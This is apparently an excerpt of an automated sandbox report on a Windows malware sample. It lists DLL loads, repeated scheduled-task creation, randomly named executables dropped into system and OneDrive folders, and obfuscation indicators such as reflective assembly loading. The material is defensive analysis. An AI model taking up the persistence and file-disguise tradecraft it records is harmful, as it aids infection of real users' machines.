            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: policymanager.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: msvcp110_win.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: pcacli.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: mscoree.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: apphelp.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: kernel.appcore.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: version.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: uxtheme.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: windows.storage.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: wldp.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: profapi.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: cryptsp.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: rsaenh.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: cryptbase.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: sspicli.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: amsi.dll
            Source: C:\serversessionmonitor\blockfont.exe | Section loaded: userenv.dll
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: propsys.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: edputil.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: netutils.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: slc.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: sppc.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: mscoree.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: apphelp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: version.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: wldp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: profapi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: sspicli.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: amsi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: userenv.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: rasapi32.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: rasman.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: rtutils.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: mswsock.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: winhttp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: winnsi.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\serversessionmonitor\blockfont.exe | Directory created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe | Directory created: C:\Program Files\Windows Portable Devices\8057c8f30c1a8e
            Source: 5P9EdUgv5r.exe | Static file information: File size 1577715 > 1048576
            Source: 5P9EdUgv5r.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 5P9EdUgv5r.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 5P9EdUgv5r.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 5P9EdUgv5r.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 5P9EdUgv5r.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 5P9EdUgv5r.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 5P9EdUgv5r.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: 5P9EdUgv5r.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 5P9EdUgv5r.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 5P9EdUgv5r.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 5P9EdUgv5r.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 5P9EdUgv5r.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RjptLIiSqcughaqdf1L.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RjptLIiSqcughaqdf1L.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, t4tDHDy3xyf70ZThD6b.cs | .Net Code: nRF0Bp4XLZ System.AppDomain.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, t4tDHDy3xyf70ZThD6b.cs | .Net Code: nRF0Bp4XLZ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, t4tDHDy3xyf70ZThD6b.cs | .Net Code: nRF0Bp4XLZ
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, t4tDHDy3xyf70ZThD6b.cs | .Net Code: nRF0Bp4XLZ System.AppDomain.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, t4tDHDy3xyf70ZThD6b.cs | .Net Code: nRF0Bp4XLZ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, t4tDHDy3xyf70ZThD6b.cs | .Net Code: nRF0Bp4XLZ
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | File created: C:\serversessionmonitor\__tmp_rar_sfx_access_check_5694421
            Source: 5P9EdUgv5r.exe | Static PE information: section name: .didat
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7E28C push eax; ret 0_2_00D7E2AA
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7ED46 push ecx; ret 0_2_00D7ED59
            Source: C:\serversessionmonitor\blockfont.exe | Code function: 4_2_00007FFD9B8E963B push edx; retf 4_2_00007FFD9B8E963C
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 20_2_00007FFD9B8D963B push edx; retf 20_2_00007FFD9B8D963C
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B8F963B push edx; retf 22_2_00007FFD9B8F963C
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 37_2_00007FFD9B90562F push ebx; ret 37_2_00007FFD9B905632
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 37_2_00007FFD9B8E963B push edx; retf 37_2_00007FFD9B8E963C
            Source: blockfont.exe.0.dr | Static PE information: section name: .text entropy: 6.996043713722853
            Source: qwhJcOiWbbUoQMvwnJNr.exe.4.dr | Static PE information: section name: .text entropy: 6.996043713722853
            Source: backgroundTaskHost.exe.4.dr | Static PE information: section name: .text entropy: 6.996043713722853
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, c8VeNg6RLOVyQqHFv1x.cs | High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
